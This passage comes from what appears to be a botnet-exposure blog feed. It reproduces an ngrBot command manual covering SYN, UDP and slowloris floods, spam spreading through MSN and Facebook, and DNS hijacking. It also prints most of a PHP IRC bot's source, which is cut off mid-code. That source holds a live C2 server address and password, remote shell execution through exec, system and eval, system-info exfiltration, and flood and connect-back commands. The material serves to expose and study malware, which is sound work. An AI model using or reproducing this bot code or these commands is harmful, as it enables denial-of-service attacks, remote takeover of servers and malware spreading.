target&lt;br /&gt;&lt;br /&gt;    Example&lt;br /&gt;&lt;br /&gt;    [00:00:00] &amp;lt;You&amp;gt; !ssyn example.com 80 60&lt;br /&gt;    [00:00:01] &amp;lt;{RU&amp;#124;W7a}abcdefg&amp;gt; [SYN]: Starting flood on &amp;quot;example.com:80&amp;quot; for 60 second(s)&lt;br /&gt;    [00:01:01] &amp;lt;{RU&amp;#124;W7a}abcdefg&amp;gt; [SYN]: Finished flood on &amp;quot;example.com:80&amp;quot;&lt;br /&gt;&lt;br /&gt;-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt; &lt;br /&gt;  !udp [host] [port] [seconds]&lt;br /&gt;&lt;br /&gt;    See here.&lt;br /&gt;&lt;br /&gt;    Parameters&lt;br /&gt;    host    Host to flood with UDP packets&lt;br /&gt;    port    Port to flood. If 0, the bot uses a random port&lt;br /&gt;    seconds    Number of seconds to flood the target&lt;br /&gt;&lt;br /&gt;    Example&lt;br /&gt;&lt;br /&gt;    [00:00:00] &amp;lt;You&amp;gt; !udp example.com 80 60&lt;br /&gt;    [00:00:01] &amp;lt;{RU&amp;#124;W7a}abcdefg&amp;gt; [UDP]: Starting flood on &amp;quot;example.com:80&amp;quot; for 60 second(s)&lt;br /&gt;    [00:01:01] &amp;lt;{RU&amp;#124;W7a}abcdefg&amp;gt; [UDP]: Finished flood on &amp;quot;example.com:80&amp;quot;&lt;br /&gt;&lt;br /&gt;-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt; &lt;br /&gt;  !slow [host] [minutes]&lt;br /&gt;&lt;br /&gt;    See here.&lt;br /&gt;&lt;br /&gt;    Parameters&lt;br /&gt;    host    Host to flood using slowloris&lt;br /&gt;    minutes    Number of minutes to flood the target&lt;br /&gt;&lt;br /&gt;    Example&lt;br /&gt;&lt;br /&gt;    [00:00:00] &amp;lt;You&amp;gt; !slow example.com 3&lt;br /&gt;    [00:00:01] &amp;lt;{RU&amp;#124;W7a}abcdefg&amp;gt; [Slowloris]: Starting flood on &amp;quot;example.com&amp;quot; for 3 minutes&lt;br /&gt;    [00:03:01] &amp;lt;{RU&amp;#124;W7a}abcdefg&amp;gt; [Slowloris]: Finished flood on &amp;quot;example.com&amp;quot;&lt;br /&gt;&lt;br /&gt;-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt; &lt;br /&gt;  !msn.int [interval]&lt;br /&gt;&lt;br /&gt;    Set the number of MSN messages in a conversation before one is changed with your spreading message. See here for more information.&lt;br /&gt;        Note: use '#' for a random interval between 1 and 9.&lt;br /&gt;&lt;br /&gt;    Parameters&lt;br /&gt;    interval    Number of MSN messages before spread&lt;br /&gt;&lt;br /&gt;    Example&lt;br /&gt;&lt;br /&gt;    [00:00:00] &amp;lt;You&amp;gt; !msn.int 3&lt;br /&gt;    [00:00:01] &amp;lt;{RU&amp;#124;W7a}abcdefg&amp;gt; [MSN]: Updated MSN spread interval to &amp;quot;3&amp;quot;&lt;br /&gt;&lt;br /&gt;-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt; &lt;br /&gt;  !msn.set [message]&lt;br /&gt;&lt;br /&gt;    Set the message that will be used for MSN spreading. See here for more information.&lt;br /&gt;        Note: use '#' for a random digit and '*' for a random lowercase letter.&lt;br /&gt;&lt;br /&gt;    Parameters&lt;br /&gt;    message    Message to spread via MSN&lt;br /&gt;&lt;br /&gt;    Example&lt;br /&gt;&lt;br /&gt;    [00:00:00] &amp;lt;You&amp;gt; !msn.set LOL http://example.com/img###/*****/DSC0001.jpg&lt;br /&gt;    [00:00:01] &amp;lt;{RU&amp;#124;W7a}abcdefg&amp;gt; [MSN]: Updated MSN spread message to &amp;quot;LOL http://example.com/img583/jgody/DSC0001.jpg&amp;quot;&lt;br /&gt;&lt;br /&gt;-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;!http.int [interval]&lt;br /&gt;&lt;br /&gt;    Set the number of Facebook messages in a conversation before one is changed with your spreading message. See here for more information.&lt;br /&gt;        Note: use '#' for a random interval between 1 and 9.&lt;br /&gt;&lt;br /&gt;    Parameters&lt;br /&gt;    interval    Number of Facebook messages before spread&lt;br /&gt;&lt;br /&gt;    Example&lt;br /&gt;&lt;br /&gt;    [00:00:00] &amp;lt;You&amp;gt; !http.int 3&lt;br /&gt;    [00:00:01] &amp;lt;{RU&amp;#124;W7a}abcdefg&amp;gt; [MSN]: Updated HTTP spread interval to &amp;quot;3&amp;quot;&lt;br /&gt;&lt;br /&gt;-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt; !http.set [message]&lt;br /&gt;&lt;br /&gt;    Set the message that will be used for Facebook spreading. See here for more information.&lt;br /&gt;        Note: use '#' for a random digit and '*' for a random lowercase letter.&lt;br /&gt;&lt;br /&gt;    Parameters&lt;br /&gt;    message    Message to spread via Facebook&lt;br /&gt;&lt;br /&gt;    Example&lt;br /&gt;&lt;br /&gt;    [00:00:00] &amp;lt;You&amp;gt; !http.set LOL http://example.com/img###/*****/DSC0001.jpg&lt;br /&gt;    [00:00:01] &amp;lt;{RU&amp;#124;W7a}abcdefg&amp;gt; [HTTP]: Updated HTTP spread message to &amp;quot;LOL http://example.com/img583/jgody/DSC0001.jpg&amp;quot;&lt;br /&gt;&lt;br /&gt;-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt; !mdns [url&amp;#124;[domain1 &amp;lt;domain2&amp;#124;ip2&amp;gt;]&amp;#124;[ip1 &amp;lt;ip2&amp;gt;]]&lt;br /&gt;&lt;br /&gt;    The bot will block access to or redirect the specified domain/IP address.&lt;br /&gt;        Note: domain to domain, domain to IP address, and IP address to IP address redirects work. IP address to domain redirection does not yet work.&lt;br /&gt;        Note: it must be the exact domain, for example &amp;quot;example.com&amp;quot; will not include &amp;quot;www.example.com&amp;quot;. Wildcard support will be added in an update.&lt;br /&gt;&lt;br /&gt;    Parameters&lt;br /&gt;    url    Plaintext file with one redirect/blocking rule per line, rules are formatted in the same way as the command parameters.&lt;br /&gt;    domain1    Requests for this domain will be redirected to domain2 or ip2 if they are set, otherwise it is blocked&lt;br /&gt;    ip1    Requests for this IP address will be redirected to ip2 if it is set, otherwise it is blocked&lt;br /&gt;    domain2    DNS queries for domain1 will be redirected to this domain if set&lt;br /&gt;    ip2    DNS queries for ip1 or domain1 will be redirected to this IP address if set&lt;br /&gt;&lt;br /&gt;    Example&lt;br /&gt;&lt;br /&gt;    [00:00:00] &amp;lt;You&amp;gt; !mdns mail.example.com&lt;br /&gt;    [00:00:01] &amp;lt;{RU&amp;#124;W7a}abcdefg&amp;gt; [DNS]: Blocked &amp;quot;mail.example.com&amp;quot;&lt;br /&gt;&lt;br /&gt;    [00:00:05] &amp;lt;You&amp;gt; !mdns http://www.example.com http://www.mysite.com&lt;br /&gt;    [00:00:06] &amp;lt;{RU&amp;#124;W7a}abcdefg&amp;gt; [DNS]: Redirected &amp;quot;www.example.com&amp;quot; to &amp;quot;www.mysite.com&amp;quot;&lt;br /&gt;    [00:00:10] &amp;lt;You&amp;gt; !mdns 127.0.0.1 127.0.0.2&lt;br /&gt;    [00:00:11] &amp;lt;{RU&amp;#124;W7a}abcdefg&amp;gt; [DNS]: Redirected &amp;quot;127.0.0.1&amp;quot; to &amp;quot;127.0.0.2&amp;quot;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/code&gt;&lt;/pre&gt;&lt;br /&gt;hosting infos:&lt;br /&gt;http://whois.domaintools.com/64.186.134.161&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-3161329090188179282?l=www.exposedbotnets.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.exposedbotnets.com/feeds/3161329090188179282/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.exposedbotnets.com/2012/01/64186134161ngrbot-103-hosted-in-united.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/3161329090188179282'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/3161329090188179282'/><link rel='alternate' type='text/html' href='http://www.exposedbotnets.com/2012/01/64186134161ngrbot-103-hosted-in-united.html' title='64.186.134.161(ngrBot 1.0.3 hosted in United States Atlanta Vpsland.com Llc)'/><author><name>Pig</name><uri>http://www.blogger.com/profile/14894907939553492625</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='12' src='http://1.bp.blogspot.com/-7kQ20oLo1uw/TsVtOg7LqTI/AAAAAAAAAIE/a6rHeP13RCU/s220/755d67fbce760704b19db198a6c7c97e.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2690706005301967154.post-1073433847202779168</id><published>2012-01-22T18:01:00.000+01:00</published><updated>2012-01-22T18:01:36.441+01:00</updated><title type='text'>83.170.89.35(linux bots hosted in United Kingdom London Uk2 - Ltd)</title><content type='html'>&lt;pre style="font-family: Andale Mono, Lucida Console, Monaco, fixed, monospace; color: #000000; background-color: #eee;font-size: 12px;border: 1px dashed #999999;line-height: 14px;padding: 5px; overflow: auto; width: 100%"&gt;&lt;code&gt;&amp;lt;?&lt;br /&gt;&lt;br /&gt;/*&lt;br /&gt; *&lt;br /&gt; *  NOGROD. since 2008&lt;br /&gt; *  IRC.UDPLINK.NET&lt;br /&gt; *&lt;br /&gt; *  COMMANDS:&lt;br /&gt; *&lt;br /&gt; *  .user &amp;lt;password&amp;gt; //login to the bot&lt;br /&gt; *  .logout //logout of the bot&lt;br /&gt; *  .die //kill the bot&lt;br /&gt; *  .restart //restart the bot&lt;br /&gt; *  .mail &amp;lt;to&amp;gt; &amp;lt;from&amp;gt; &amp;lt;subject&amp;gt; &amp;lt;msg&amp;gt; //send an email&lt;br /&gt; *  .dns &amp;lt;IP&amp;#124;HOST&amp;gt; //dns lookup&lt;br /&gt; *  .download &amp;lt;URL&amp;gt; &amp;lt;filename&amp;gt; //download a file&lt;br /&gt; *  .exec &amp;lt;cmd&amp;gt; // uses exec() //execute a command&lt;br /&gt; *  .sexec &amp;lt;cmd&amp;gt; // uses shell_exec() //execute a command&lt;br /&gt; *  .cmd &amp;lt;cmd&amp;gt; // uses popen() //execute a command&lt;br /&gt; *  .info //get system information&lt;br /&gt; *  .php &amp;lt;php code&amp;gt; // uses eval() //execute php code&lt;br /&gt; *  .tcpflood &amp;lt;target&amp;gt; &amp;lt;packets&amp;gt; &amp;lt;packetsize&amp;gt; &amp;lt;port&amp;gt; &amp;lt;delay&amp;gt; //tcpflood attack&lt;br /&gt; *  .udpflood &amp;lt;target&amp;gt; &amp;lt;packets&amp;gt; &amp;lt;packetsize&amp;gt; &amp;lt;delay&amp;gt; //udpflood attack&lt;br /&gt; *  .raw &amp;lt;cmd&amp;gt; //raw IRC command&lt;br /&gt; *  .rndnick //change nickname&lt;br /&gt; *  .pscan &amp;lt;host&amp;gt; &amp;lt;port&amp;gt; //port scan&lt;br /&gt; *  .safe  // test safe_mode (dvl)&lt;br /&gt; *  .inbox &amp;lt;to&amp;gt; // test inbox (dvl)&lt;br /&gt; *  .conback &amp;lt;ip&amp;gt; &amp;lt;port&amp;gt; // conect back (dvl)&lt;br /&gt; *  .uname // return shell's uname using a php function (dvl)&lt;br /&gt; *&lt;br /&gt; */&lt;br /&gt;&lt;br /&gt;set_time_limit(0);&lt;br /&gt;error_reporting(0);&lt;br /&gt;echo &amp;quot;BlackPower!&amp;quot;;&lt;br /&gt;&lt;br /&gt;class pBot&lt;br /&gt;{&lt;br /&gt; var $config = array(&amp;quot;server&amp;quot;=&amp;gt;&amp;quot;83.170.89.35&amp;quot;,&lt;br /&gt;                     &amp;quot;port&amp;quot;=&amp;gt;&amp;quot;6667&amp;quot;,&lt;br /&gt;                     &amp;quot;pass&amp;quot;=&amp;gt;&amp;quot;&amp;quot;,&lt;br /&gt;                     &amp;quot;prefix&amp;quot;=&amp;gt;&amp;quot;roots&amp;quot;,&lt;br /&gt;                     &amp;quot;maxrand&amp;quot;=&amp;gt;&amp;quot;5&amp;quot;,&lt;br /&gt;                     &amp;quot;chan&amp;quot;=&amp;gt;&amp;quot;#power&amp;quot;,&lt;br /&gt;                     &amp;quot;chan2&amp;quot;=&amp;gt;&amp;quot;#power&amp;quot;,&lt;br /&gt;                     &amp;quot;key&amp;quot;=&amp;gt;&amp;quot;sunset&amp;quot;,&lt;br /&gt;                     &amp;quot;modes&amp;quot;=&amp;gt;&amp;quot;+p&amp;quot;,&lt;br /&gt;                     &amp;quot;password&amp;quot;=&amp;gt;&amp;quot;powercrew&amp;quot;,&lt;br /&gt;                     &amp;quot;trigger&amp;quot;=&amp;gt;&amp;quot;.&amp;quot;,&lt;br /&gt;                     &amp;quot;hostauth&amp;quot;=&amp;gt;&amp;quot;*&amp;quot; // * for any hostname ( remember: /setvhost lAgi.seRius.sCan )&lt;br /&gt;                     );&lt;br /&gt; var $users = array();&lt;br /&gt; function start()&lt;br /&gt; {&lt;br /&gt;    if(!($this-&amp;gt;conn = fsockopen($this-&amp;gt;config['server'],$this-&amp;gt;config['port'],$e,$s,30)))&lt;br /&gt;       $this-&amp;gt;start();&lt;br /&gt;    $ident = $this-&amp;gt;config['prefix'];&lt;br /&gt;    $alph = range(&amp;quot;0&amp;quot;,&amp;quot;100&amp;quot;);&lt;br /&gt;    for($i=0;$i&amp;lt;$this-&amp;gt;config['maxrand'];$i++)&lt;br /&gt;       $ident .= $alph[rand(0,100)];&lt;br /&gt;    if(strlen($this-&amp;gt;config['pass'])&amp;gt;0)&lt;br /&gt;       $this-&amp;gt;send(&amp;quot;PASS &amp;quot;.$this-&amp;gt;config['pass']);&lt;br /&gt;    $this-&amp;gt;send(&amp;quot;USER &amp;quot;.$ident.&amp;quot; 127.0.0.1 localhost :&amp;quot;.php_uname().&amp;quot;&amp;quot;);&lt;br /&gt;    $this-&amp;gt;set_nick();&lt;br /&gt;    $this-&amp;gt;main();&lt;br /&gt; }&lt;br /&gt; function main()&lt;br /&gt; {&lt;br /&gt;    while(!feof($this-&amp;gt;conn))&lt;br /&gt;    {&lt;br /&gt;       $this-&amp;gt;buf = trim(fgets($this-&amp;gt;conn,512));&lt;br /&gt;       $cmd = explode(&amp;quot; &amp;quot;,$this-&amp;gt;buf);&lt;br /&gt;       if(substr($this-&amp;gt;buf,0,6)==&amp;quot;PING :&amp;quot;)&lt;br /&gt;       {&lt;br /&gt;          $this-&amp;gt;send(&amp;quot;PONG :&amp;quot;.substr($this-&amp;gt;buf,6));&lt;br /&gt;       }&lt;br /&gt;       if(isset($cmd[1]) &amp;amp;&amp;amp; $cmd[1] ==&amp;quot;001&amp;quot;)&lt;br /&gt;       {&lt;br /&gt;          $this-&amp;gt;send(&amp;quot;MODE &amp;quot;.$this-&amp;gt;nick.&amp;quot; &amp;quot;.$this-&amp;gt;config['modes']);&lt;br /&gt;          $this-&amp;gt;join($this-&amp;gt;config['chan'],$this-&amp;gt;config['key']);&lt;br /&gt;          if (@ini_get(&amp;quot;safe_mode&amp;quot;) or strtolower(@ini_get(&amp;quot;safe_mode&amp;quot;)) == &amp;quot;on&amp;quot;) { $safemode = &amp;quot;on&amp;quot;; }&lt;br /&gt;          else { $safemode = &amp;quot;off&amp;quot;; }&lt;br /&gt;          $uname = php_uname();&lt;br /&gt;          $this-&amp;gt;privmsg($this-&amp;gt;config['chan2'],&amp;quot;[\2uname!\2]: $uname (safe: $safemode)&amp;quot;);&lt;br /&gt;          $this-&amp;gt;privmsg($this-&amp;gt;config['chan2'],&amp;quot;[\2vuln!\2]: http://&amp;quot;.$_SERVER['SERVER_NAME'].&amp;quot;&amp;quot;.$_SERVER['REQUEST_URI'].&amp;quot;&amp;quot;);&lt;br /&gt;       }&lt;br /&gt;       if(isset($cmd[1]) &amp;amp;&amp;amp; $cmd[1]==&amp;quot;433&amp;quot;)&lt;br /&gt;       {&lt;br /&gt;          $this-&amp;gt;set_nick();&lt;br /&gt;       }&lt;br /&gt;       if($this-&amp;gt;buf != $old_buf)&lt;br /&gt;       {&lt;br /&gt;          $mcmd = array();&lt;br /&gt;          $msg = substr(strstr($this-&amp;gt;buf,&amp;quot; :&amp;quot;),2);&lt;br /&gt;          $msgcmd = explode(&amp;quot; &amp;quot;,$msg);&lt;br /&gt;          $nick = explode(&amp;quot;!&amp;quot;,$cmd[0]);&lt;br /&gt;          $vhost = explode(&amp;quot;@&amp;quot;,$nick[1]);&lt;br /&gt;          $vhost = $vhost[1];&lt;br /&gt;          $nick = substr($nick[0],1);&lt;br /&gt;          $host = $cmd[0];&lt;br /&gt;          if($msgcmd[0]==$this-&amp;gt;nick)&lt;br /&gt;          {&lt;br /&gt;           for($i=0;$i&amp;lt;count($msgcmd);$i++)&lt;br /&gt;              $mcmd[$i] = $msgcmd[$i+1];&lt;br /&gt;          }&lt;br /&gt;          else&lt;br /&gt;          {&lt;br /&gt;           for($i=0;$i&amp;lt;count($msgcmd);$i++)&lt;br /&gt;              $mcmd[$i] = $msgcmd[$i];&lt;br /&gt;          }&lt;br /&gt;          if(count($cmd)&amp;gt;2)&lt;br /&gt;          {&lt;br /&gt;             switch($cmd[1])&lt;br /&gt;             {&lt;br /&gt;                case &amp;quot;QUIT&amp;quot;:&lt;br /&gt;                   if($this-&amp;gt;is_logged_in($host))&lt;br /&gt;                   {&lt;br /&gt;                      $this-&amp;gt;log_out($host);&lt;br /&gt;                   }&lt;br /&gt;                break;&lt;br /&gt;                case &amp;quot;PART&amp;quot;:&lt;br /&gt;                   if($this-&amp;gt;is_logged_in($host))&lt;br /&gt;                   {&lt;br /&gt;                      $this-&amp;gt;log_out($host);&lt;br /&gt;                   }&lt;br /&gt;                break;&lt;br /&gt;                case &amp;quot;PRIVMSG&amp;quot;:&lt;br /&gt;                   if(!$this-&amp;gt;is_logged_in($host) &amp;amp;&amp;amp; ($vhost == $this-&amp;gt;config['hostauth'] &amp;#124;&amp;#124; $this-&amp;gt;config['hostauth'] == &amp;quot;*&amp;quot;))&lt;br /&gt;                   {&lt;br /&gt;                      if(substr($mcmd[0],0,1)==&amp;quot;.&amp;quot;)&lt;br /&gt;                      {&lt;br /&gt;                         switch(substr($mcmd[0],1))&lt;br /&gt;                         {&lt;br /&gt;                            case &amp;quot;user&amp;quot;:&lt;br /&gt;                              if($mcmd[1]==$this-&amp;gt;config['password'])&lt;br /&gt;                              {&lt;br /&gt;                                 $this-&amp;gt;log_in($host);&lt;br /&gt;                              }&lt;br /&gt;                              else&lt;br /&gt;                              {&lt;br /&gt;                                 $this-&amp;gt;notice($this-&amp;gt;config['chan'],&amp;quot;[\2Auth\2]: Senha errada $nick idiota!!&amp;quot;);&lt;br /&gt;                              }&lt;br /&gt;                            break;&lt;br /&gt;                         }&lt;br /&gt;                      }&lt;br /&gt;                   }&lt;br /&gt;                   elseif($this-&amp;gt;is_logged_in($host))&lt;br /&gt;                   {&lt;br /&gt;                      if(substr($mcmd[0],0,1)==&amp;quot;.&amp;quot;)&lt;br /&gt;                      {&lt;br /&gt;                         switch(substr($mcmd[0],1))&lt;br /&gt;                         {&lt;br /&gt;                            case &amp;quot;restart&amp;quot;:&lt;br /&gt;                               $this-&amp;gt;send(&amp;quot;QUIT :restart commando from $nick&amp;quot;);&lt;br /&gt;                               fclose($this-&amp;gt;conn);&lt;br /&gt;                               $this-&amp;gt;start();&lt;br /&gt;                            break;&lt;br /&gt;                            case &amp;quot;mail&amp;quot;: //mail to from subject message&lt;br /&gt;                               if(count($mcmd)&amp;gt;4)&lt;br /&gt;                               {&lt;br /&gt;                                  $header = &amp;quot;From: &amp;lt;&amp;quot;.$mcmd[2].&amp;quot;&amp;gt;&amp;quot;;&lt;br /&gt;                                  if(!mail($mcmd[1],$mcmd[3],strstr($msg,$mcmd[4]),$header))&lt;br /&gt;                                  {&lt;br /&gt;                                     $this-&amp;gt;privmsg($this-&amp;gt;config['chan'],&amp;quot;[\2mail\2]: Impossivel mandar e-mail.&amp;quot;);&lt;br /&gt;                                  }&lt;br /&gt;                                  else&lt;br /&gt;                                  {&lt;br /&gt;                                     $this-&amp;gt;privmsg($this-&amp;gt;config['chan'],&amp;quot;[\2mail\2]: Mensagem enviada para \2&amp;quot;.$mcmd[1].&amp;quot;\2&amp;quot;);&lt;br /&gt;                                  }&lt;br /&gt;                               }&lt;br /&gt;                            break;&lt;br /&gt;                            case &amp;quot;safe&amp;quot;:&lt;br /&gt;                               if (@ini_get(&amp;quot;safe_mode&amp;quot;) or strtolower(@ini_get(&amp;quot;safe_mode&amp;quot;)) == &amp;quot;on&amp;quot;)&lt;br /&gt;                               {&lt;br /&gt;                               $safemode = &amp;quot;on&amp;quot;;&lt;br /&gt;                               }&lt;br /&gt;                               else {&lt;br /&gt;                               $safemode = &amp;quot;off&amp;quot;;&lt;br /&gt;                               }&lt;br /&gt;                               $this-&amp;gt;privmsg($this-&amp;gt;config['chan'],&amp;quot;[\2safe mode\2]: &amp;quot;.$safemode.&amp;quot;&amp;quot;);&lt;br /&gt;                            break;&lt;br /&gt;                            case &amp;quot;inbox&amp;quot;: //teste inbox&lt;br /&gt;                               if(isset($mcmd[1]))&lt;br /&gt;                               {&lt;br /&gt;                                  $token = md5(uniqid(rand(), true));&lt;br /&gt;                                  $header = &amp;quot;From: &amp;lt;inbox&amp;quot;.$token.&amp;quot;@xdevil.org&amp;gt;&amp;quot;;&lt;br /&gt;                                  $a = php_uname();&lt;br /&gt;                                  $b = getenv(&amp;quot;SERVER_SOFTWARE&amp;quot;);&lt;br /&gt;                                  $c = gethostbyname($_SERVER[&amp;quot;HTTP_HOST&amp;quot;]);&lt;br /&gt;                                  if(!mail($mcmd[1],&amp;quot;InBox Test&amp;quot;,&amp;quot;#nogRod. since 2008\n\nip: $c \nsoftware: $b \nsystem: $a \nvuln: http://&amp;quot;.$_SERVER['SERVER_NAME'].&amp;quot;\n\ngreetz: irc.udplink.net\nNOGROD OWNZ&amp;quot;,$header))&lt;br /&gt;                                  {&lt;br /&gt;                                     $this-&amp;gt;privmsg($this-&amp;gt;config['chan'],&amp;quot;[\2inbox\2]: Unable to send&amp;quot;);&lt;br /&gt;                                  }&lt;br /&gt;                                  else&lt;br /&gt;                                  {&lt;br /&gt;                                     $this-&amp;gt;privmsg($this-&amp;gt;config['chan'],&amp;quot;[\2inbox\2]: Message sent to \2&amp;quot;.$mcmd[1].&amp;quot;\2&amp;quot;);&lt;br /&gt;                                  }&lt;br /&gt;                               }&lt;br /&gt;                            break;&lt;br /&gt;                            case &amp;quot;conback&amp;quot;:&lt;br /&gt;                               if(count($mcmd)&amp;gt;2)&lt;br /&gt;                               {&lt;br /&gt;                                  $this-&amp;gt;conback($mcmd[1],$mcmd[2]);&lt;br /&gt;                               }&lt;br /&gt;                            break;&lt;br /&gt;                            case &amp;quot;dns&amp;quot;:&lt;br /&gt;                               if(isset($mcmd[1]))&lt;br /&gt;                               {&lt;br /&gt;                                  $ip = explode(&amp;quot;.&amp;quot;,$mcmd[1]);&lt;br /&gt;                                  if(count($ip)==4 &amp;amp;&amp;amp; is_numeric($ip[0]) &amp;amp;&amp;amp; is_numeric($ip[1]) &amp;amp;&amp;amp; is_numeric($ip[2]) &amp;amp;&amp;amp; is_numeric($ip[3]))&lt;br /&gt;                                  {&lt;br /&gt;                                     $this-&amp;gt;privmsg($this-&amp;gt;config['chan'],&amp;quot;[\2dns\2]: &amp;quot;.$mcmd[1].&amp;quot; =&amp;gt; &amp;quot;.gethostbyaddr($mcmd[1]));&lt;br /&gt;                                  }&lt;br /&gt;                                  else&lt;br /&gt;                                  {&lt;br /&gt;                                     $this-&amp;gt;privmsg($this-&amp;gt;config['chan'],&amp;quot;[\2dns\2]: &amp;quot;.$mcmd[1].&amp;quot; =&amp;gt; &amp;quot;.gethostbyname($mcmd[1]));&lt;br /&gt;                                  }&lt;br /&gt;                               }&lt;br /&gt;                            break;&lt;br /&gt;                            case &amp;quot;info&amp;quot;:&lt;br /&gt;                            case &amp;quot;vunl&amp;quot;:&lt;br /&gt;                               if (@ini_get(&amp;quot;safe_mode&amp;quot;) or strtolower(@ini_get(&amp;quot;safe_mode&amp;quot;)) == &amp;quot;on&amp;quot;) { $safemode = &amp;quot;on&amp;quot;; }&lt;br /&gt;                               else { $safemode = &amp;quot;off&amp;quot;; }&lt;br /&gt;                               $uname = php_uname();&lt;br /&gt;                               $this-&amp;gt;privmsg($this-&amp;gt;config['chan'],&amp;quot;[\2info\2]: $uname (safe: $safemode)&amp;quot;);&lt;br /&gt;                               $this-&amp;gt;privmsg($this-&amp;gt;config['chan'],&amp;quot;[\2vuln\2]: http://&amp;quot;.$_SERVER['SERVER_NAME'].&amp;quot;&amp;quot;.$_SERVER['REQUEST_URI'].&amp;quot;&amp;quot;);&lt;br /&gt;                            break;&lt;br /&gt;                            case &amp;quot;bot&amp;quot;:&lt;br /&gt;                               $this-&amp;gt;privmsg($this-&amp;gt;config['chan'],&amp;quot;[\2bot\2]: phpbot 2.0 by; NOGROD.&amp;quot;);&lt;br /&gt;                            break;&lt;br /&gt;                            case &amp;quot;uname&amp;quot;:&lt;br /&gt;                               if (@ini_get(&amp;quot;safe_mode&amp;quot;) or strtolower(@ini_get(&amp;quot;safe_mode&amp;quot;)) == &amp;quot;on&amp;quot;) { $safemode = &amp;quot;on&amp;quot;; }&lt;br /&gt;                               else { $safemode = &amp;quot;off&amp;quot;; }&lt;br /&gt;                               $uname = php_uname();&lt;br /&gt;                               $this-&amp;gt;privmsg($this-&amp;gt;config['chan'],&amp;quot;[\2info\2]: $uname (safe: $safemode)&amp;quot;);&lt;br /&gt;                            break;&lt;br /&gt;                            case &amp;quot;rndnick&amp;quot;:&lt;br /&gt;                               $this-&amp;gt;set_nick();&lt;br /&gt;                            break;&lt;br /&gt;                            case &amp;quot;raw&amp;quot;:&lt;br /&gt;                               $this-&amp;gt;send(strstr($msg,$mcmd[1]));&lt;br /&gt;                            break;&lt;br /&gt;                            case &amp;quot;eval&amp;quot;:&lt;br /&gt;                              $eval = eval(substr(strstr($msg,$mcmd[1]),strlen($mcmd[1])));&lt;br /&gt;                            break;&lt;br /&gt;                                        case &amp;quot;sexec&amp;quot;:&lt;br /&gt;                               $command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);&lt;br /&gt;                               $exec = shell_exec($command);&lt;br /&gt;                               $ret = explode(&amp;quot;\n&amp;quot;,$exec);&lt;br /&gt;                               for($i=0;$i&amp;lt;count($ret);$i++)&lt;br /&gt;                                  if($ret[$i]!=NULL)&lt;br /&gt;                                     $this-&amp;gt;privmsg($this-&amp;gt;config['chan'],&amp;quot;      : &amp;quot;.trim($ret[$i]));&lt;br /&gt;                            break;&lt;br /&gt;&lt;br /&gt;                            case &amp;quot;exec&amp;quot;:&lt;br /&gt;                               $command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);&lt;br /&gt;                               $exec = exec($command);&lt;br /&gt;                               $ret = explode(&amp;quot;\n&amp;quot;,$exec);&lt;br /&gt;                               for($i=0;$i&amp;lt;count($ret);$i++)&lt;br /&gt;                                  if($ret[$i]!=NULL)&lt;br /&gt;                                     $this-&amp;gt;privmsg($this-&amp;gt;config['chan'],&amp;quot;      : &amp;quot;.trim($ret[$i]));&lt;br /&gt;                            break;&lt;br /&gt;&lt;br /&gt;                            case &amp;quot;passthru&amp;quot;:&lt;br /&gt;                               $command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);&lt;br /&gt;                               $exec = passthru($command);&lt;br /&gt;                               $ret = explode(&amp;quot;\n&amp;quot;,$exec);&lt;br /&gt;                               for($i=0;$i&amp;lt;count($ret);$i++)&lt;br /&gt;                                  if($ret[$i]!=NULL)&lt;br /&gt;                                     $this-&amp;gt;privmsg($this-&amp;gt;config['chan'],&amp;quot;      : &amp;quot;.trim($ret[$i]));&lt;br /&gt;                            break;&lt;br /&gt;&lt;br /&gt;                            case &amp;quot;popen&amp;quot;:&lt;br /&gt;                               if(isset($mcmd[1]))&lt;br /&gt;                               {&lt;br /&gt;                                  $command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);&lt;br /&gt;                                  $this-&amp;gt;privmsg($this-&amp;gt;config['chan'],&amp;quot;[\2popen\2]: $command&amp;quot;);&lt;br /&gt;                                  $pipe = popen($command,&amp;quot;r&amp;quot;);&lt;br /&gt;                                  while(!feof($pipe))&lt;br /&gt;                                  {&lt;br /&gt;                                     $pbuf = trim(fgets($pipe,512));&lt;br /&gt;                                     if($pbuf != NULL)&lt;br /&gt;                                        $this-&amp;gt;privmsg($this-&amp;gt;config['chan'],&amp;quot;     : $pbuf&amp;quot;);&lt;br /&gt;                                  }&lt;br /&gt;                                  pclose($pipe);&lt;br /&gt;                               }  &lt;br /&gt;&lt;br /&gt;                            case &amp;quot;system&amp;quot;:&lt;br /&gt;                               $command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);&lt;br /&gt;                               $exec = system($command);&lt;br /&gt;                               $ret = explode(&amp;quot;\n&amp;quot;,$exec);&lt;br /&gt;                               for($i=0;$i&amp;lt;count($ret);$i++)&lt;br /&gt;                                  if($ret[$i]!=NULL)&lt;br /&gt;                                     $this-&amp;gt;privmsg($this-&amp;gt;config['chan'],&amp;quot;      : &amp;quot;.trim($ret[$i]));&lt;br /&gt;                            break;&lt;br /&gt;&lt;br /&gt;                            case &amp;quot;pscan&amp;quot;: // .pscan 127.0.0.1 